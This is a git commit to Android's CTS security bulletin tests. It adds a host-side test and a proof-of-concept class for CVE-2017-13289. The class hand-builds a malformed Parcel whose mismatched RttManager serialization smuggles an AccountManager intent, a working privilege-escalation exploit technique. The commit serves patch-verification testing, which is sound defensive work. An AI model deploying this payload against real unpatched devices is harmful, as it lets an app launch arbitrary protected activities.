commit 444017e123fac55fba3293bf11cd6fa6e6bffa8b
author Christopher Dombroski <cdombroski@google.com> Fri Jan 25 14:47:39 2019 -0800
committer Christopher Dombroski <cdombroski@google.com> Fri Mar 15 16:12:39 2019 -0700
tree 4b4fa4764fa1ced4ed90f2b9b948727a9b1be2af
parent b0ea0d7322d682b433c8aec810bccbc82de85dc2

CTS test for Android Security CVE-2017-13289

Test: successful run of newly introduced STS test case.

Bug:74612223
Bug:70398564
Change-Id: If0fa29d25fa099989ff3e2e5d33874351bfe3de2

hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java

diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java
index 9dd3d2d..b1ed666 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java
@@ -34,8 +34,17 @@
      * b/69634768
      * Does not require root but must be a hostside test to avoid a race condition
      */
-    @SecurityTest
+    @SecurityTest(minPatchLevel = "2018-04")
     public void testPocCVE_2017_13288() throws Exception {
         LaunchSomeWhere.launchSomeWhere("CVE_2017_13288", getDevice());
     }
+
+    /**
+     * b/70398564
+     * Does not require root but must be a hostside test to avoid a race condition
+     */
+    @SecurityTest(minPatchLevel = "2018-04")
+    public void testPocCVE_2017_13289() throws Exception {
+        LaunchSomeWhere.launchSomeWhere("CVE_2017_13289", getDevice());
+    }
 }

hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13289.java

diff --git a/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13289.java b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13289.java
new file mode 100644
index 0000000..716dda6
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13289.java
@@ -0,0 +1,92 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package com.android.security.cts.launchanywhere;
+
+import android.accounts.AccountManager;
+import android.content.Intent;
+import android.os.Parcel;
+
+public class CVE_2017_13289 implements IGenerateMalformedParcel {
+    public Parcel generate(Intent intent) {
+        Parcel data = Parcel.obtain();
+        String responseName = "android.accounts.IAccountAuthenticatorResponse";
+        data.writeInterfaceToken(responseName);
+        data.writeInt(1);
+        int bundleLenPos = data.dataPosition();
+        data.writeInt(0xffffffff);
+        data.writeInt(0x4C444E42);
+        int bundleStartPos = data.dataPosition();
+        data.writeInt(2);
+
+        data.writeString("launchanywhere");
+        data.writeInt(4);
+        data.writeString("android.net.wifi.RttManager$ParcelableRttResults");
+        data.writeInt(1);
+        data.writeString(null);
+        data.writeInt(0);
+        data.writeInt(0);
+        data.writeInt(0);
+        data.writeInt(0);
+        data.writeInt(0);
+        data.writeInt(0);
+        data.writeInt(0);
+        data.writeLong(0);
+        data.writeInt(0);
+        data.writeInt(0);
+        data.writeInt(0);
+        data.writeLong(0);
+        data.writeLong(0);
+        data.writeLong(0);
+        data.writeInt(0);
+        data.writeInt(0);
+        data.writeInt(0);
+        data.writeInt(0);
+        data.writeInt(0);
+        data.writeInt(0xff);
+        data.writeInt(12);
+        data.writeInt(12);
+        data.writeInt(12);
+        data.writeInt(0);
+        data.writeInt(0);
+        data.writeInt(0);
+
+        data.writeInt(0);
+
+        data.writeString(null);
+        data.writeInt(13);
+        int byteArrayLenPos = data.dataPosition();
+        data.writeInt(0xffffffff);
+        int byteArrayStartPos = data.dataPosition();
+        data.writeString(AccountManager.KEY_INTENT);
+        data.writeInt(4);
+        data.writeString("android.content.Intent");
+        intent.writeToParcel(data, 0);
+        int byteArrayEndPos = data.dataPosition();
+        data.setDataPosition(byteArrayLenPos);
+        int byteArrayLen = byteArrayEndPos - byteArrayStartPos;
+        data.writeInt(byteArrayLen);
+        data.setDataPosition(byteArrayEndPos);
+
+        int bundleEndPos = data.dataPosition();
+        data.setDataPosition(bundleLenPos);
+        int bundleLen = bundleEndPos - bundleStartPos;
+        data.writeInt(bundleLen);
+        data.setDataPosition(bundleEndPos);
+
+        return data;
+    }
+}